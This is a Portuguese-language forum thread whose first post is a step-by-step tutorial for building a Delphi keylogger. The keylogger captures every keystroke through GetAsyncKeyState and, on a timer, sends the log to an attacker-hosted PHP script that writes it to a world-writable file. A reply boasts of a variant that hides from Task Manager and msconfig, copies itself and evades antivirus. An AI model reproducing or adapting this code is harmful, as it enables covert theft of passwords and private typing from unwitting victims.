Forum ViSiBLe

Bem Vindo
Se registrares neste fórum, podes fazer parte da nossa comunidade.Prezamos aqui pela participação ACTIVA de cada membro.


Atençao: Nao precisa Confirma a sua conta no hotmail (Basta Registrar e Começar a participar do forum.)

WWW.FORUMVISIBLE.COM

Temos vagas na STAFF !! Clique Aqui!

[Delphi + PHP] Criando Keylogger com Send Infos PHP

Compartilhe
avatar
Devaster007
MEMBRO
MEMBRO

Número de Mensagens : 47
Idade : 30
Agradecimentos Agradecimentos : 13
Data de inscrição : 30/01/2011

[Delphi + PHP] Criando Keylogger com Send Infos PHP

Mensagem por Devaster007 em 9/14/2011, 15:04

Criando um Keylogger que Envia Infos para Site


Primeiramente abra seu IDE Delphi e adicione os seguintes modelos:

- 2 Timers
- 1 WebBrowser
- 1 Memo

Vamos então adicionar os códigos delphi

TIMER1:

procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(' [BACKSPACE] ');
9: Coloca(' [TAB] ');
12: Coloca(' [ALT] ');
13: Coloca(' [ENTER] ');
16: Coloca(' [SHIFT] ');
17: Coloca(' [CONTROL] ');
18: Coloca(' [ALT] ');
20: Coloca(' [CAPS LOCK] ');
21: Coloca(' [PAGE UP] ');
27: Coloca(' [ESC] ');
33: Coloca(' [PAGE UP] ');
34: Coloca(' [PAGE DOWN] ');
35: Coloca(' [END] ');
36: Coloca(' [HOME] ');
37: Coloca(' [SETA ESQUERDA] ');
38: Coloca(' [SETA ACIMA] ');
39: Coloca(' [SETA DIREITA] ');
40: Coloca(' [SETA ABAIXO] ');
45: Coloca(' [INSERT] ');
46: Coloca(' [DEL] ');
91: Coloca(' [WIN ESQUERDA] ');
92: Coloca(' [WIN DIREITA] ');
93: Coloca(' [MENU POP-UP] ');
96: Coloca('0');
97: Coloca('1');
98: Coloca('2');
99: Coloca('3');
100: Coloca('4');
101: Coloca('5');
102: Coloca('6');
103: Coloca('7');
104: Coloca('8');
105: Coloca('9');
106: Coloca(' [NUM *] ');
107: Coloca(' [NUM +] ');
109: Coloca(' [NUM -] ');
110: Coloca(' [NUM SEP. DECIMAL] ');
111: Coloca(' [NUM /] ');
112: Coloca(' [F1] ');
113: Coloca(' [F2] ');
114: Coloca(' [F3] ');
115: Coloca(' [F4] ');
116: Coloca(' [F5] ');
117: Coloca(' [F6] ');
118: Coloca(' [F7] ');
119: Coloca(' [F8] ');
120: Coloca(' [F9] ');
121: Coloca(' [F10] ');
122: Coloca(' [F11] ');
123: Coloca(' [F12] ');
144: Coloca(' [NUM LOCK] ');
186: Coloca('Ç');
187: Coloca('=');
188: Coloca(',');
189: Coloca('-');
190: Coloca('.');
191: Coloca(';');
192: Coloca(' [APÓSTROFO] ');
193: Coloca('/');
194: Coloca(' [NUM PONTO] ');
219: Coloca('´');
220: Coloca(']');
221: Coloca('[');
222: Coloca('~');
226: Coloca('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then
Coloca(Chr(keyloop));
if (keyloop >= 32) and (keyloop <= 63) then
Coloca(Chr(keyloop));
//numpad keycodes
if (keyloop >= 96) and (keyloop <= 110) then
Coloca(Chr(keyloop));
end;
end; //case;
inc(keyloop);
until keyloop = 255;
end;


TIMER2:


Web.Navigate('[Você precisa estar registrado e conectado para ver este link.] + memo1.text);

Configure os timers para o seguinte modo:

Intervalo do Timer 1 = 000001 ms (true)
Intervalo do Timer 2 = 160000 ms (true)

NO PHP:

Então agora vamos para parte php

Pegue o seguinte código php:

pagina.php

Código PHP:
$set = $_GET['value'];
$fp = fopen('value.txt', 'w');
fwrite($fp,$set);
fclose($fp);
echo "Sucess";
?>
Hospede em algum local (esta url será colocada no delphi)
Após hospedar coloque a url no delphi (como dito acima [Você precisa estar registrado e conectado para ver este link.]

E deixe com Chmod no valor de 777.

Compile seu Keylogger,execute e acesse o site onde ficaram as informações

Código:

[Você precisa estar registrado e conectado para ver este link.]

Boa sorte com 'projeto',
avatar
jefersonkennedy
MEMBRO
MEMBRO

Número de Mensagens : 2
Idade : 25
Agradecimentos Agradecimentos : 0
Data de inscrição : 22/11/2011

Re: [Delphi + PHP] Criando Keylogger com Send Infos PHP

Mensagem por jefersonkennedy em 11/22/2011, 20:06

kkkkk bem parecido com o que eu fiz, só que o meu ta + complexo.

Sem webbrowser pq consome muita rar

to usando um idhttp


Controlo o intervalo dos log
desativo certas maquinas
fiz sumir do gerenciador de tarefas e do msconfig

Alem de rodar oculto no sistema, se auto copia . kkk e ainda fiz ele sumir de alguns AV´s

Me add te mandei uma MP

    Data/hora atual: 9/23/2017, 01:36